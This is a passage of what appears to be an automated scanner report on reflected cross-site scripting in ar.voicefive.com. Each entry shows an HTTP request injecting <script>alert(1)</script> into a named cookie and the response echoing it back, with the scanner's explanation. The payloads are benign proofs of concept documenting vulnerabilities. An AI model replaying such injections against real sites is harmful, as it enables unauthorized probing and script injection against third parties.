Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&d6675<script>alert(1)</script>095736833d1; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 01:21:27 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 01:21:27 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1006
({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov ...[SNIP]... u Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&', "ar_p43112268": 'exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&d6675<script>alert(1)</script>095736833d1', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&', "BMX_3PC": '1', "BMX_BR": 'pid=p76910469&pr ...[SNIP]...
The value of the ar_p70821733 cookie is copied into the HTML document as plain text between tags. The payload 1a3de<script>alert(1)</script>93ab378cd29 was submitted in the ar_p70821733 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /b/node_rcAll.pli HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&1a3de<script>alert(1)</script>93ab378cd29; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 01:21:28 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 01:21:28 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1006
({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23 ...[SNIP]... ecExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&1a3de<script>alert(1)</script>93ab378cd29', "ar_p76459327": 'exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&', "ar_p72213098": 'exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:0 ...[SNIP]...
The value of the ar_p72213098 cookie is copied into the HTML document as plain text between tags. The payload c879d<script>alert(1)</script>13e65dbf77c was submitted in the ar_p72213098 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /b/node_rcAll.pli HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&c879d<script>alert(1)</script>13e65dbf77c; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 01:21:28 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 01:21:28 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1006
({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&', "ar_p72213098": 'exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&c879d<script>alert(1)</script>13e65dbf77c', "ar_p43112268": 'exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat D ...[SNIP]...
The value of the ar_p76230671 cookie is copied into the HTML document as plain text between tags. The payload 3f330<script>alert(1)</script>2a436cc7f7a was submitted in the ar_p76230671 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /b/node_rcAll.pli HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&3f330<script>alert(1)</script>2a436cc7f7a; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 01:21:23 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 01:21:23 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1006
({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&3f330<script>alert(1)</script>2a436cc7f7a', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&', "ar_p72213098": 'exp=2&initExp=Thu Nov 25 14:06:18 2010&recEx ...[SNIP]...
The value of the ar_p76459327 cookie is copied into the HTML document as plain text between tags. The payload a6ce8<script>alert(1)</script>25bb0887bd5 was submitted in the ar_p76459327 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /b/node_rcAll.pli HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&a6ce8<script>alert(1)</script>25bb0887bd5; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 01:21:27 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 01:21:27 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1006
({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23 ...[SNIP]... Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&', "ar_p76459327": 'exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&a6ce8<script>alert(1)</script>25bb0887bd5', "ar_p72213098": 'exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&', "ar_p43112268": 'exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:4 ...[SNIP]...
The value of the ar_p76910469 cookie is copied into the HTML document as plain text between tags. The payload fb924<script>alert(1)</script>7182dbda062 was submitted in the ar_p76910469 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /b/node_rcAll.pli HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&fb924<script>alert(1)</script>7182dbda062; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 01:21:20 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 01:21:20 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1006
({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov ...[SNIP]... Oct 30 01:41:28 2010&prad=48493791&arc=37093140&', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&fb924<script>alert(1)</script>7182dbda062', "BMX_3PC": '1', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=1292110859', "ar_70821733": 'exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu000033 ...[SNIP]...
The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload ff04f<script>alert(1)</script>c7ac47bc395 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859; ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; UID=177862ed-204.0.5.41-1288922372; BMX_3PC=1ff04f<script>alert(1)</script>c7ac47bc395
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 01:37:08 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 14211
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... 010&prad=48493791&arc=37093140&', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&', "BMX_3PC": '1ff04f<script>alert(1)</script>c7ac47bc395', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=1292110859', "ar_70821733": 'exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&', "ar_p76459 ...[SNIP]...
The value of the BMX_BR cookie is copied into the HTML document as plain text between tags. The payload 99b81<script>alert(1)</script>d14639a4c05 was submitted in the BMX_BR cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=129211085999b81<script>alert(1)</script>d14639a4c05; ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; UID=177862ed-204.0.5.41-1288922372; BMX_3PC=1
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 01:37:05 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 14211
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... -1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&', "BMX_3PC": '1', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=129211085999b81<script>alert(1)</script>d14639a4c05', "ar_70821733": 'exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&', "ar_p76459327": 'exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec ...[SNIP]...
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload dccd3<script>alert(1)</script>b5f1dbeef61 was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859; ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; UID=177862ed-204.0.5.41-1288922372dccd3<script>alert(1)</script>b5f1dbeef61; BMX_3PC=1
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 01:37:07 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 14211
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... 4:08:26 2010&prad=56363817&arc=38845248&', "ar_p43112268": 'exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&', "UID": '177862ed-204.0.5.41-1288922372dccd3<script>alert(1)</script>b5f1dbeef61', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&', "BMX_3PC": '1', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=1292110859', "ar_708 ...[SNIP]...
The value of the ar_70821733 cookie is copied into the HTML document as plain text between tags. The payload f80cc<script>alert(1)</script>16705103bb7 was submitted in the ar_70821733 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
